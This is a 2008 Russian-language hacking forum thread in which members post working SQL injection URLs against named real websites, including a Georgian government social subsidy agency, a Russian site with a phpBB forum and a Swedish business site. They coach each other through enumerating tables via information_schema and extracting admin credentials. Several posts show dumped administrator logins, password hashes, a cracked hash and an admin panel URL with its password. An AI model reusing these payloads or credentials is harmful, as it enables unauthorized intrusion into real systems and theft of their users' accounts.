27.08.2008, 20:34
|
|
Постоянный
Регистрация: 21.08.2008
Сообщений: 302
Провел на форуме:
458686
Репутация:
-25
|
|
http://15rus.ru/txt.php?cat=-3+union+select+1,2,3,4,5,6,7,8/*
Так?
|
|
|
27.08.2008, 20:36
|
|
Участник форума
Регистрация: 25.05.2007
Сообщений: 147
Провел на форуме:
2313429
Репутация:
728
|
|
2 SeNaP
А хэши по-твоему только md5 в природе существуют ? По длине хэша, это скорее всего mysql хэш, брутить Passwords Pro
www.hashcracking.info рулит
43e9a4ab75570f5b : admin
2 geforse
Пипл, вы пистец, вы статьи читайте. С чего ты решил что полей 8 ? Unknown column '8' in 'order clause'
И для вопросов существует отдельная тема. Джифорс, читай статьи.
Эмм, сначала я прогнал, решив, что полей два. Пасиба .Begemot.'y, который меня поправил ^^
Последний раз редактировалось 0nep@t0p; 28.08.2008 в 01:07..
|
|
|
|
27.08.2008, 20:48
|
|
Постоянный
Регистрация: 21.08.2008
Сообщений: 302
Провел на форуме:
458686
Репутация:
-25
|
|
Не выводит на полях http://15rus.ru/txt.php?cat=-3+union+select+1,2,3,4,5,6,7,8/*
version()
Что делать?
|
|
|
|
27.08.2008, 21:57
|
|
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497
Репутация:
303
|
|
http://www.maxivetlanda.se/view_2008.php?katid=-1+union+select+concat(0x3a3a,loginnamn,0x3a3a,lose nord,0x3a3a)+from+anv+limit+0,1/*
login: super password: duper
http://www.maxivetlanda.se/admin
|
|
|
|
28.08.2008, 02:05
|
|
Участник форума
Регистрация: 25.05.2007
Сообщений: 147
Провел на форуме:
2313429
Репутация:
728
|
|
Эмм, там таблиц с юзерами пхпбб форума аж 3 -
http://15rus.ru/txt.php?cat=-3+union+select+1,table_name,3,4,5,6,7,8,9+from+inf ormation_schema.columns+where+column_name=0x757365 726E616D65/*
Тебе нужна не phpbb_users, а phpbb2_users, ибо у мну ща выпала ошибка -
phpBB : Critical Error
Error obtaining user details
DEBUG MODE
SELECT * FROM phpbb2_users WHERE user_id = -1
=/
Правильный запрос выглядит так -
http://15rus.ru/txt.php?cat=-3+union+select+1,concat(username,0x3a,user_passwor d),3,4,5,6,7,8,9+from+u19256.phpbb2_users+where+us er_level=1/*
Это 4 админа форума, теперь расшифровывай хэши
Последний раз редактировалось 0nep@t0p; 28.08.2008 в 02:14..
|
|
|
|
28.08.2008, 03:25
|
|
Участник форума
Регистрация: 17.06.2008
Сообщений: 214
Провел на форуме:
964766
Репутация:
228
|
|
грузинский сайтег The So cial Subsi dy Agency
http://www.ssa.gov.ge
Код:
http://www.ssa.gov.ge/index.php?id=-88+union+select+1,2,3,4,5,6,7,8,9,version(),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25/*
version() - 4.0.27
user() - ssa_gov_ge@localhost
database() - ssa_gov_ge
Пробовал получить доступ к mysql.user , но его нету. |
|
|
|
28.08.2008, 07:48
|
|
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
Провел на форуме:
791766
Репутация:
61
|
|
А подскажите плиз как увидеть поле...
....pricelist.php?step=2&server=-2%20union%20select%20concat_ws(0x3a3a,table_name,c olumn_name)%20from%20information_schema.columns+li mit+237,1--
Этим запросом мы видим Table and Column в БД information_schema как сделать так чтоб было видно поле в колонке?
|
|
|
|
28.08.2008, 07:57
|
|
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
Провел на форуме:
3629857
Репутация:
504
|
|
вот так
....pricelist.php?step=2&server=-2+union+select+concat_ws(0x3a3a,<имя столбца который хочешь посмотреть>)+from+<имя таблицы, где эта колонка>+limit+0,1--
|
|
|
|
28.08.2008, 08:13
|
|
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
Провел на форуме:
791766
Репутация:
61
|
|
видимо немного не так меня понели или это я не понимаю так как 1 раз инъекцию провожу
У меня есть БД information_schema в ней есть в ней есть таблица user_list в этой таблице есть поля такие как pass и login и мне нужно посмотреть значение этих полей.
С помощью этого запроса я вижу таблицу и колонку user_list:  ass
...pricelist.php?step=2&server=-2%20union%20select%20concat_ws(0x3a3a,table_name,c olumn_name)%20from%20information_schema.columns+li mit+237,1--
|
|
|
|
28.08.2008, 08:17
|
|
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
Провел на форуме:
3629857
Репутация:
504
|
|
я же вроде написал как...
...pricelist.php?step=2&server=-2+union+select+concat_ws(0x3a3a,login,pass)+from+u ser_list+limit+0,1--
только пробел удали в user_list |
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
